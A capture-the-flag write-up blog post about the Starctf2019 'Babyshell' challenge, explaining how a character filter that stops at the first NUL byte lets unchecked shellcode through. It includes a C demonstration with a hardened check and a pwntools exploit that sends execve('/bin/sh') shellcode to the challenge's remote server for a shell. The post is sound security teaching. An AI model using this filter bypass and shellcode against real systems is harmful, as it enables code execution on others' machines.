Starctf2019_Babyshell

Quite an interesting challenge… PPP is far too strong..

start

binary
PPP solved it within minutes of the challenge going live… far too strong…

analysis

At first I did not look carefully and assumed it was a restricted-charset shellcode challenge, much like deathnote, alivenote and MnO2 on pwnable.tw…
Later I noticed that the check itself has a problem: it can be truncated with a \x00 byte.

// Decompiled character filter. Every byte of the input a1 must appear in the
// allowed table asc, but the outer loop stops at the first NUL byte, so any
// bytes after a \x00 are never checked.
for ( i = a1; *i; ++i )
{
  for ( j = &asc; *j && *j != *i; ++j )
    ;
  if ( !*j )            // byte not found in asc -> reject
    return 0LL;
}

The loop exits as soon as *i is 0, so the checked portion of the input can be cut short with a NUL byte.
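To make the bug concrete, here is an added example (not the challenge's own code): the decompiled loop reimplemented next to a length-aware version, both run on a constructed payload shaped like the one in the exploit. The allowed-character table asc is constructed here because the writeup does not list the real one.

```c
#include <stddef.h>
#include <string.h>

/* Constructed allowed-character table for this example; the real table
 * (asc in the binary) is not reproduced in the writeup. */
static const char asc[] = "gs\njaZ_";

/* Mirrors the decompiled loop: the input is walked as a C string, so the
 * check stops at the first NUL and never sees the bytes after it.
 * Returns 1 if accepted, 0 if a checked byte is outside the table. */
int check_vuln(const char *a1)
{
    const char *i, *j;
    for (i = a1; *i; ++i) {
        for (j = asc; *j && *j != *i; ++j)
            ;
        if (!*j)
            return 0;
    }
    return 1;
}

/* Hardened form: validates every byte of the buffer that will actually be
 * executed, using its length rather than NUL termination. A NUL byte is
 * rejected too because it is not in the table. */
int check_fixed(const unsigned char *buf, size_t len)
{
    for (size_t k = 0; k < len; ++k) {
        if (memchr(asc, buf[k], sizeof asc - 1) == NULL)
            return 0;
    }
    return 1;
}

/* Constructed payload in the shape of the exploit's: a leading NUL, a few
 * bytes from the table, then bytes outside it (0x0f 0x05 = syscall) that
 * stand in for the execve shellcode. */
static const unsigned char payload[] = {
    0x00, 'g', 's', '\n', 'j', 'a', 'Z', 0x0f, 0x05
};

/* The vulnerable check accepts the payload because of the leading NUL;
 * the length-aware check rejects it. Returns 1 when both behave that way. */
int demo(void)
{
    return check_vuln((const char *)payload) == 1
        && check_fixed(payload, sizeof payload) == 0;
}
```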

exploitation

Use the available characters together with \x00 to build a shellcode prefix that does not crash, then append the sh shellcode after it.

exp

from pwn import *
context.log_level='debug'
context.arch='amd64'
#p=process('./shellcode')
#gdb.attach(p,'b *0x4008cb')
p=remote("34.92.37.22",10002)

# execve("/bin/sh", NULL, NULL); 0x68732f6e69622f is "/bin/sh\0" little-endian
sh='''
xor rax,rax
mov al,0x3b
xor rsi,rsi
xor rdi,rdi
xor rdx,rdx
mov rdi,0x68732f6e69622f
push rdi
mov rdi,rsp
syscall
'''
sh=asm(sh)
# the leading \x00 ends the charset check early; "gs\njaZ" decodes to
# instructions that do not crash, then the real shellcode follows
# (bytes literals so that str + bytes does not fail under Python 3)
p.sendlineafter(b":",b"\x00gs\njaZ"+sh)
p.interactive()
'''
[_]: pop rdi
[Z]: pop rdx
'''
Author: n132!
Link: https://n132.github.io/2019/04/29/2019-04-29-Starctf2019-Babyshell/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.